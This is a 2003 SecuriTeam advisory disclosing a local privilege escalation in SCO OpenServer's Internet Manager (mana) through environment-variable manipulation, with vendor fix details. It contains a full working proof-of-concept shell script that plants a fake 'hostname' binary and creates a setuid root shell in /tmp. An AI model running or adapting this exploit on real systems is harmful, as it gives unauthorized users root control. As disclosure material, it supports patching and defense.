[UNIX] SCO Internet Manager Allows Local Users to Gain Root Level Privileges
From: SecuriTeam (support_at_securiteam.com)
Date: 09/17/03
- Previous message: SecuriTeam: "[REVS] Integer Array Overflows"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 17 Sep 2003 15:38:24 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SCO Internet Manager Allows Local Users to Gain Root Level Privileges
------------------------------------------------------------------------
SUMMARY
A vulnerability in the SCO Internet Manager (mana) allows local attackers
to gain root privileges by redirecting certain environment variables to a
shell binary.
DETAILS
Vulnerable systems:
* OpenServer version 5.0.5 up to version 5.0.7
The SCO Internet Manager (mana) is designed to be run via the ncsa_httpd
on port 615 and it is password protected.
However, running /usr/internet/admin/mana/mana locally is possible.
By exporting the environment variable REMOTE_ADDR and setting it to
127.0.0.1, mana can be tricked to execute the file menu.mana as if it was
run via the nsca_httpd password protected area.
Another interesting environment variable is PATH_INFO that tells mana what
mana file should be executed.
This tells us that mana will execute "hostname" when this file is run. By
changing the environment variables PATH_INFO to /pass-err.mana and PATH to
/:$PATH would make mana execute ./hostname with root privileges.
The file pass-err.mana contains the following lines:
<TCL>
if {[catch {exec hostname} hostName] != 0} {
set hostName localhost
}
set mana(localHostName) $hostName
return {}
</TCL>
This tells us that mana will execute "hostname" when this file is run.
By changing the environment variables PATH_INFO to /pass-err.mana and PATH
to ./:$PATH would make mana execute ./hostname with root privileges.
Example (Simple POC):
This proof of concept for OpenServer 5.0.7 should give any local user
euid=0(root).
$ uname -a
SCO_SV openserv 3.2 5.0.7 i386
$ id
uid=200(test) gid=50(group) groups=50(group)
$ sh mana-root.sh
# id
uid=200(test) gid=50(group) euid=0(root) groups=50(group)
Exploit mana-root.sh:
#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
#
REMOTE_ADDR=127.0.0.1
PATH_INFO=/pass-err.mana
PATH=./:$PATH
export REMOTE_ADDR
export PATH_INFO
export PATH
echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname
chmod 755 hostname
/usr/internet/admin/mana/mana > /dev/null
/tmp/sh
Workaround:
The proper solution is to install the latest packages.
Location of fixed binaries:
<ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19>
ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19.
Installing fixed binaries:
Upgrade the affected binaries with the following sequence:
1) Download the VOL* files to the /tmp directory
2) Run the custom command, specify an install from media images, and
specify the /tmp directory as the location of the images.
Disclosure Timeline:
9/02/2003: Vendor notified by e-mail
9/03/2003: Vendor has verified the issue and is working on the solution
9/15/2003: Public release
ADDITIONAL INFORMATION
The original advisory can be downloaded from:
<http://www.texonet.com/advisories/TEXONET-20030902.txt>
http://www.texonet.com/advisories/TEXONET-20030902.txt.
The information has been provided by <mailto:advisories@texonet.com>
Texonet.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[REVS] Integer Array Overflows"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Multiple Vendor Insecure use of CreateProcess()
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Improper use of Windows API
command CreateProcess allows attackers to ... until a module is encountered to execute.
... This creates a scenario whereby arbitrary code could be executed. ... (Securiteam) - [NT] Switch Off Multiple Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Stack-based Buffer Overflow:
... execute arbitrary code on the remote system - possibly with SYSTEM ... boundaries
until the ecx register reaches zero (where the ecx was the ... (Securiteam) - [NEWS] URL Parsing and Plain Text Password disclosure in Best Buy Employee Toolkit Software
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... entered in the URL area and an
attacker could use this to execute a local ... command shell or execute other programs
locally stored. ... Store's central server. ... (Securiteam) - [UNIX] Open Webmail Remote Command Execution (userstat.pl)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A remote attacker can run arbitrary
commands with the web ... The vulnerability was discovered in an obsolete script named
userstat.pl ... commands an attacker would want to execute. ... (Securiteam) - [UNIX] xloadimage Multiple Vulnerabilities (Buffer Overflow, Command Execution)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... to execute arbitrary commands
via malformed images. ... Multiple buffer overflow in xloadimage allow remote attackers to execute
... Under Linux the buffer overflows allow remote attackers to execute ... (Securiteam)